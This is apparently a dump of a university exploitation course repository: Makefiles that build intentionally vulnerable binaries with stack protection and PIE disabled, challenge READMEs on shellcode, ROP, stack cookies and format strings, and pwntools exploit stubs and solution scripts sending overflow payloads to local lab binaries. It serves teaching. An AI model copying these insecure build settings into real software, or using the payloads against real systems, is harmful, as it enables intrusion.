-------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week6/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week7/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) 12 | -------------------------------------------------------------------------------- /src/week7/challenges/2048/Makefile: -------------------------------------------------------------------------------- 1 | all: 2048 2 | 3 | 2048: 2048.c 4 | $(CC) -std=gnu99 -O0 -I../../shared -fPIE -pie -Wl,-z,relro,-z,now -fstack-protector-all -o $@ $< 5 | 6 | clean: 7 | rm -rf 2048 8 | -------------------------------------------------------------------------------- /src/week4/challenges/4-stack-cookie-2/README: -------------------------------------------------------------------------------- 1 | Can you guess my random and then break this stack cookie? 2 | 3 | srand(time(0)) & rand() is not secure at all never use this combo 4 | for your secret homework... 5 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-32/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-code-exec-32 2 | 3 | fs-code-exec-32: fs-code-exec-32.c 4 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -no-pie -g 5 | 6 | clean: 7 | rm -rf fs-code-exec-32 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-64/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-code-exec-64 2 | 3 | fs-code-exec-64: fs-code-exec-64.c 4 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -no-pie -g 5 | 6 | clean: 7 | rm -rf fs-code-exec-64 8 | -------------------------------------------------------------------------------- /src/week1/challenges/level0/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level0 4 | 5 | level0: level0.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level0 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level1/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level1 4 | 5 | level1: level1.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level1 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level2/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level2 4 | 5 | level2: level2.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level2 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level3/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level3 4 | 5 | level3: level3.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level3 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level4/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level4 4 | 5 | level4: level4.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level4 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level5/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level5 4 | 5 | level5: level5.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level5 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level6/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level6 4 | 5 | level6: level6.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level6 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level7/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level7 4 | 5 | level7: level7.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level7 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level8/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level8 4 | 5 | level8: level8.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level8 10 | -------------------------------------------------------------------------------- /src/week1/challenges/level9/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: level9 4 | 5 | level9: level9.c 6 | $(CC) -o $@ $< -fno-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE 7 | 8 | clean: 9 | rm -rf level9 10 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-32/README: -------------------------------------------------------------------------------- 1 | Call: 2 | mprotect(global_variable_area, 0x1000, 7) 3 | read(1, global_variable_area+something, 0x100) 4 | // put your shellcode at there and return to the address! 5 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-64/README: -------------------------------------------------------------------------------- 1 | Call: 2 | mprotect(global_variable_area, 0x1000, 7) 3 | read(1, global_variable_area+something, 0x100) 4 | // put your shellcode at there and return to the address! 5 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-32/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: fs-arbt-read-32 3 | 4 | fs-arbt-read-32: fs-arbt-read-32.c 5 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -no-pie -g 6 | 7 | clean: 8 | rm -rf fs-arbt-read-32 9 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-64/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: fs-arbt-read-64 3 | 4 | fs-arbt-read-64: fs-arbt-read-64.c 5 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -no-pie -g 6 | 7 | clean: 8 | rm -rf fs-arbt-read-64 9 | -------------------------------------------------------------------------------- /src/week7/challenges/one-format-string/Makefile: -------------------------------------------------------------------------------- 1 | all: one-format-string 2 | 3 | one-format-string: one-format-string.c 4 | clang -o $@ $< -fstack-protector-strong -m64 5 | 6 | clean: 7 | rm one-format-string 8 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level0/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./bof-level0") 6 | 7 | print(p.recv()) 8 | 9 | p.sendline("A") 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./bof-level1") 6 | 7 | print(p.recv()) 8 | 9 | p.sendline("A") 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | all: bof-level6 4 | 5 | bof-level6: bof-level6.c 6 | $(CC) -o $@ $< -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level6 10 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level8/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | all: bof-level8 4 | 5 | bof-level8: bof-level8.c 6 | $(CC) -o $@ $< -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level8 10 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-1-32/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-1-32 2 | 3 | rop-1-32: rop-1-32.c 4 | cc -o $@ $< -m32 -fno-stack-protector -DBUFSIZE=128 -O0 -no-pie 5 | 6 | clean: 7 | rm -rf rop-1-32 rop-2-64 rop-3-32 rop-4-64 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-32/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-2-32 2 | 3 | rop-2-32: rop-2-32.c 4 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -fno-stack-protector -no-pie 5 | 6 | clean: 7 | rm -rf rop-1-32 rop-2-64 rop-3-32 rop-4-64 8 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | p = process("./rop-3-32") 7 | 8 | addr_mprotect = p.elf.symbols['mprotect'] 9 | 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-3-64/exploit-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | p = process("./rop-3-64") 7 | 8 | addr_mprotect = p.elf.symbols['mprotect'] 9 | 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-32/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: fs-arbt-write-32 3 | 4 | fs-arbt-write-32: fs-arbt-write-32.c 5 | cc -o $@ $< -m32 -DBUFSIZE=128 -O0 -no-pie -g 6 | 7 | clean: 8 | rm -rf fs-arbt-write-32 9 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-64/Makefile: -------------------------------------------------------------------------------- 1 | 2 | all: fs-arbt-write-64 3 | 4 | fs-arbt-write-64: fs-arbt-write-64.c 5 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -no-pie -g 6 | 7 | clean: 8 | rm -rf fs-arbt-write-64 9 | -------------------------------------------------------------------------------- /solutions/week2/bof-level0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./bof-level0") 6 | 7 | print(p.recv()) 8 | 9 | p.sendline("A" * 20 + "ABCDEFGH") 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week1/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /src/week2/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level1/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: bof-level1 4 | 5 | bof-level1: bof-level1.c 6 | $(CC) -o $@ $< -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level1 10 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level3/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: bof-level3 4 | 5 | bof-level3: bof-level3.c 6 | $(CC) -o $@ $< -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level3 10 | -------------------------------------------------------------------------------- /src/week3/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /src/week3/challenges/nonzero-shellcode-32/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: nonzero-shellcode-32 4 | 5 | nonzero-shellcode-32: shellcode.c 6 | $(CC) -m32 -o $@ $< 7 | 8 | clean: 9 | @rm -rf nonzero-shellcode-32 10 | -------------------------------------------------------------------------------- /src/week3/challenges/nonzero-shellcode-64/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: nonzero-shellcode-64 4 | 5 | nonzero-shellcode-64: shellcode.c 6 | $(CC) -m64 -o $@ $< 7 | 8 | clean: 9 | @rm -rf nonzero-shellcode-64 10 | -------------------------------------------------------------------------------- /src/week4/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /src/week5/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /src/week5/challenges/rop-2-64/Makefile: -------------------------------------------------------------------------------- 1 | all: rop-2-64 2 | 3 | rop-2-64: rop-2-64.c 4 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -fno-stack-protector -no-pie 5 | 6 | 7 | clean: 8 | rm -rf rop-1-32 rop-2-64 rop-3-32 rop-4-64 9 | -------------------------------------------------------------------------------- /src/week6/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /src/week7/challenges/Makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(wildcard */.) 2 | 3 | all: $(SUBDIRS) 4 | 5 | $(SUBDIRS): 6 | $(MAKE) -C $@ 7 | 8 | clean: 9 | $(MAKE) -C $(SUBDIRS) clean 10 | 11 | .PHONY: all $(SUBDIRS) clean 12 | -------------------------------------------------------------------------------- /solutions/week2/bof-level1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./bof-level1") 6 | 7 | print(p.recv()) 8 | 9 | p.sendline("A" * 32 + "ABCDEFGHabcdefgh") 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level0/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: bof-level0 4 | 5 | bof-level0: bof-level0.c 6 | $(CC) -o $@ $< -m32 -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level0 10 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level2/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: bof-level2 4 | 5 | bof-level2: bof-level2.c 6 | $(CC) -o $@ $< -m32 -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level2 10 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level4/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | all: bof-level4 4 | 5 | bof-level4: bof-level4.c 6 | $(CC) -o $@ $< -m32 -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level4 10 | -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-32/README: -------------------------------------------------------------------------------- 1 | Write a 32-bit shellcode that runs: 2 | setregid(getegid(), getegid()) 3 | execve("/bin/sh", 0, 0); 4 | and put the shellcode binary (shellcode.bin) into this directory. 5 | 6 | 7 | -------------------------------------------------------------------------------- /src/week3/challenges/shellcode-64/README: -------------------------------------------------------------------------------- 1 | Write a 64-bit shellcode that runs: 2 | setregid(getegid(), getegid()) 3 | execve("/bin/sh", 0, 0); 4 | and put the shellcode binary (shellcode.bin) into this directory. 5 | 6 | 7 | -------------------------------------------------------------------------------- /src/week4/challenges/4-stack-cookie-2/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-cookie-2 2 | 3 | stack-cookie-2: stack-cookie-2.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf stack-cookie-2 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-64/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process('fs-arbt-write-64') 6 | 7 | gr_addr = p.elf.symbols['global_random'] 8 | 9 | 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-pie-64/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-code-exec-pie-64 2 | 3 | fs-code-exec-pie-64: fs-code-exec-pie-64.c 4 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -g -fPIE -pie 5 | 6 | clean: 7 | rm -rf fs-code-exec-pie-64 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-no-binary-pie-64/Makefile: -------------------------------------------------------------------------------- 1 | all: fs-no-binary-pie-64 2 | 3 | fs-no-binary-pie-64: fs-no-binary-pie-64.c 4 | cc -o $@ $< -m64 -DBUFSIZE=128 -O0 -g -fPIE -pie 5 | 6 | clean: 7 | rm -rf fs-no-binary-pie-64 8 | -------------------------------------------------------------------------------- /src/week7/challenges/2048/README: -------------------------------------------------------------------------------- 1 | Are you good at 2048? 2 | Can you score more than 4000000? 3 | http://www.randalolson.com/2015/04/27/artificial-intelligence-has-crushed-all-human-records-in-2048-heres-how-the-ai-pulled-it-off/ 4 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level5/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | all: bof-level5 4 | 5 | bof-level5: bof-level5.c 6 | $(CC) -o $@ $< -no-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level5 10 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level7/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | all: bof-level7 4 | 5 | bof-level7: bof-level7.c 6 | $(CC) -o $@ $< -no-pie -m32 -fno-stack-protector -U_FORTIFY_SOURCE -O0 7 | 8 | clean: 9 | rm -rf bof-level7 10 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level9/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | 3 | all: bof-level9 4 | 5 | bof-level9: bof-level9.c 6 | $(CC) -o $@ $< -no-pie -fno-stack-protector -U_FORTIFY_SOURCE -O0 -m32 7 | 8 | clean: 9 | rm -rf bof-level9 10 | -------------------------------------------------------------------------------- /src/week3/challenges/alphanumeric-shellcode-32/Makefile: -------------------------------------------------------------------------------- 1 | all: alphanumeric-shellcode 2 | CC=clang 3 | alphanumeric-shellcode: alphanumeric-shellcode.c 4 | $(CC) -o $@-32 $< -m32 5 | 6 | clean: 7 | rm -rf alphanumeric-shellcode-32 8 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-write-32/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./fs-arbt-write-32") 6 | 7 | gr_addr = p.elf.symbols['global_random'] 8 | 9 | 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /src/week7/challenges/get-flag-without-write-nor-exec/get-flag-without-write-nor-exec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blue9057/cyber-attacks-and-defense/HEAD/src/week7/challenges/get-flag-without-write-nor-exec/get-flag-without-write-nor-exec -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-ovfl-where-32 2 | 3 | stack-ovfl-where-32: stack-ovfl-where.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=30 5 | 6 | clean: 7 | rm -rf stack-ovfl-sc-32 8 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32/README: -------------------------------------------------------------------------------- 1 | The program checks the return address, and it must be within the range of 2 | 0x8048000 ~ 0x8049000 (is it true? analyze the binary!). 3 | Can you execute your shellcode with this program? 4 | -------------------------------------------------------------------------------- /src/week1/challenges/level0/README: -------------------------------------------------------------------------------- 1 | The program asks you a password, and it uses strcmp() to compare 2 | your input and the password. 3 | 4 | Can you discover the password to get a privileged shell from the challenge? 5 | 6 | Hint: use ltrace 7 | -------------------------------------------------------------------------------- /src/week1/challenges/level3/README: -------------------------------------------------------------------------------- 1 | The program reads five integers and does some calculations. 2 | 3 | Can you discover values that let you get a privileged shell from the challenge? 4 | 5 | Hint: A slightly modified challenge from level2 6 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level6/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level6') 6 | e = ELF('./bof-level6') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | p.interactive() 11 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level5/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level5') 6 | e = ELF('./bof-level5') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level9/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process('./bof-level9') 6 | e = ELF('./bof-level9') 7 | 8 | get_a_shell = e.symbols['get_a_shell'] 9 | 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week3/challenges/short-shellcode-32/Makefile: -------------------------------------------------------------------------------- 1 | all: short-shellcode-32 2 | 3 | CC=clang 4 | 5 | short-shellcode-32: short-shellcode.c 6 | $(CC) -m32 -o short-shellcode-32 $< -z execstack 7 | 8 | clean: 9 | @rm -rf short-shellcode-32 10 | -------------------------------------------------------------------------------- /src/week3/challenges/short-shellcode-64/Makefile: -------------------------------------------------------------------------------- 1 | all: short-shellcode-64 2 | 3 | CC=clang 4 | 5 | short-shellcode-64: short-shellcode.c 6 | $(CC) -m64 -o short-shellcode-64 $< -z execstack 7 | 8 | clean: 9 | @rm -rf short-shellcode-64 10 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-ovfl-no-envp-32 2 | 3 | stack-ovfl-no-envp-32: stack-ovfl-no-envp.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=4 5 | 6 | clean: 7 | rm -rf stack-ovfl-no-envp-32 8 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-where-32-2/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-ovfl-where-32-2 2 | 3 | stack-ovfl-where-32-2: stack-ovfl-where.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=30 5 | 6 | clean: 7 | rm -rf stack-ovfl-sc-32-2 8 | -------------------------------------------------------------------------------- /src/week4/challenges/5-stack-cookie-3/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-cookie-3 2 | 3 | stack-cookie-3: stack-cookie-3.c 4 | cc -o $@ $< -m32 -z execstack -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf stack-cookie-1 stack-cookie-2 stack-cookie-3 stack-cookie-4 8 | -------------------------------------------------------------------------------- /src/week6/challenges/aw-2/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | env = { 5 | 'PATH': '.' 6 | } 7 | p = process("./aw-2", env=env) 8 | 9 | printf_got = p.elf.got['printf'] 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-use-envp-32/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-ovfl-use-envp-32 2 | 3 | stack-ovfl-use-envp-32: stack-ovfl-use-envp.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=4 5 | 6 | clean: 7 | rm -rf stack-ovfl-use-envp 8 | -------------------------------------------------------------------------------- /src/week4/challenges/2-dep-3/README: -------------------------------------------------------------------------------- 1 | Can you run the following functions by exploiting 2 | a buffer overflow vulnerability? 3 | 4 | 1. fd = open("flag", O_RDONLY); 5 | 2. read(fd, buf, 0x100); 6 | 3. write(1, buf, 0x100); 7 | 8 | Then, the flag is yours! 9 | -------------------------------------------------------------------------------- /src/week6/challenges/aw-1/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./aw-1") 6 | 7 | printf_got = p.elf.got['printf'] 8 | target_address = p.elf.symbols['please_execute_me'] 9 | 10 | 11 | p.interactive() 12 | -------------------------------------------------------------------------------- /solutions/week3/stack-ovfl-sc-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /solutions/week3/stack-ovfl-no-envp-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /solutions/week3/stack-ovfl-use-envp-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /solutions/week3/stack-ovfl-where-32-2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /solutions/week3/stack-ovfl-where-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week4/challenges/6-stack-cookie-4/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-cookie-4 2 | 3 | stack-cookie-4: stack-cookie-4.c 4 | cc -o $@ $< -m32 -z execstack -DBUFSIZE=128 -O0 -fstack-protector 5 | 6 | clean: 7 | rm -rf stack-cookie-1 stack-cookie-2 stack-cookie-3 stack-cookie-4 8 | -------------------------------------------------------------------------------- /src/week4/challenges/3-stack-cookie-1/Makefile: -------------------------------------------------------------------------------- 1 | all: stack-cookie-1 2 | 3 | stack-cookie-1: stack-cookie-1.c 4 | cc -o $@ $< -m32 -fno-stack-protector -z execstack -DBUFSIZE=128 -O0 5 | 6 | clean: 7 | rm -rf stack-cookie-1 stack-cookie-2 stack-cookie-3 stack-cookie-4 8 | -------------------------------------------------------------------------------- /solutions/week3/stack-ovfl-no-envp-no-argv-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-sc-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 | p.sendline("A"*42 + p32(JUMP_ADDR)) 10 | 11 | print p.recvrepeat(1) 12 | -------------------------------------------------------------------------------- /src/week3/challenges/stack-ovfl-no-envp-32/exploit-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | 5 | p = process("./stack-ovfl-32") 6 | 7 | JUMP_ADDR = p.elf.symbols['execute_me'] 8 | 9 